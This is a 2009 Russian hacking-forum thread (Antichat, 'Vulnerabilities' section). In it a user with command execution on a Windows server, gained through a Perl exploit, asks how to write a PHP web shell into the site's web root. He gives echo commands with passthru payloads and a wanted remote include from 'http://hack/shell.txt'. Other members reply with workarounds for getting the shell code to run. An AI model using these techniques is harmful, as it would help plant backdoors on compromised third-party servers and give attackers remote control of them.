ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

cmd????
  #1  
Старый 06.02.2009, 16:13
Аватар для fly
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


Отправить сообщение для fly с помощью ICQ
По умолчанию cmd????

Вопрос такой!
Есть доступ к командной строке на win сервере , через cmd могу выполнять команды , хотел создать файл Php и впихнуть , синтаксис такой

так создается
echo test > "D:\Website\WWW\1.php"


если так вообще ничего не создается
echo <?php passthru $cmd?> > "D:\Website\WWW\1.php"

если так ,создается, но с кавычками
echo "<?php passthru $cmd?>" > "D:\Website\WWW\1.php"

т.е. на выходе получаю "<?php passthru $cmd?>"
Php на серваке есть!

Как добавить Php код , чтобы он выполнялся!?Желательно <?@include('http://hack/shell.txt');?>

p.s. ftp не предлагать , tftp тоже, не прокатит,Фаер фильтрут выход.!!!

Последний раз редактировалось fly; 06.02.2009 в 16:17..
 
Ответить с цитированием

  #2  
Старый 06.02.2009, 16:18
Аватар для gold-goblin
gold-goblin
Познавший АНТИЧАТ
Регистрация: 26.03.2007
Сообщений: 1,095
Провел на форуме:
5265510

Репутация: 455


По умолчанию

как выйти именно из этой ситуации я хз..
Попробуй поднять фтп и передать шел =)
 
Ответить с цитированием

  #3  
Старый 06.02.2009, 16:21
Аватар для fly
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


Отправить сообщение для fly с помощью ICQ
По умолчанию

gold-goblin

Да не да типичная ситуация, попробуй на своем компе локально создать файл и передать ему php код. Я просто не знаю точного синтаксиса на win
 
Ответить с цитированием

  #4  
Старый 06.02.2009, 16:22
Аватар для Brain explosion
Brain explosion
Banned
Регистрация: 30.01.2009
Сообщений: 28
Провел на форуме:
221135

Репутация: 40
По умолчанию

нах тебе php-шелл, если у тебя уже cmd-шелл?
 
Ответить с цитированием

  #5  
Старый 06.02.2009, 16:26
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
fly

если так ,создается, но с кавычками
echo "<?php passthru $cmd?>" > "D:\Website\WWW\1.php"
edit D:\Website\WWW\1.php
 
Ответить с цитированием

  #6  
Старый 06.02.2009, 16:30
Аватар для geezer.code
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

а чем кавычки мешают ? он и с ними будет нормально интерпретироваться.
 
Ответить с цитированием

  #7  
Старый 06.02.2009, 16:35
Аватар для fly
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


Отправить сообщение для fly с помощью ICQ
По умолчанию

to geezer.code

нет белый фон ""

а в исходники страницы "<?phpinfo();?>"

вообще не в тему Pashkela
 
Ответить с цитированием

  #8  
Старый 06.02.2009, 16:36
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
вообще не в тему Pashkela
почему? У меня работает

сначала залил, точно как ты, а потом edit и убираешь кавычки
 
Ответить с цитированием

  #9  
Старый 06.02.2009, 16:40
Аватар для fly
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


Отправить сообщение для fly с помощью ICQ
По умолчанию

)))это локально)) , а у меня через сплоит перловый!
 
Ответить с цитированием

  #10  
Старый 06.02.2009, 16:41
Аватар для geezer.code
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

а ты сделай "<?php phpinfo();?>" обязательно - php
проверил локально, работает.

"<?phpinfo();?>" тоже выводит ""

Последний раз редактировалось geezer.code; 06.02.2009 в 16:51..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как запустить файл win32 из под cmd? Student :) Болталка 12 03.11.2009 07:53
Можно ли потушить Outpost Firewall 3.0с Cmd donetsk АнтиАдмин 33 01.02.2009 21:01
CMD sadfeel АнтиАдмин 13 08.12.2008 18:37



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ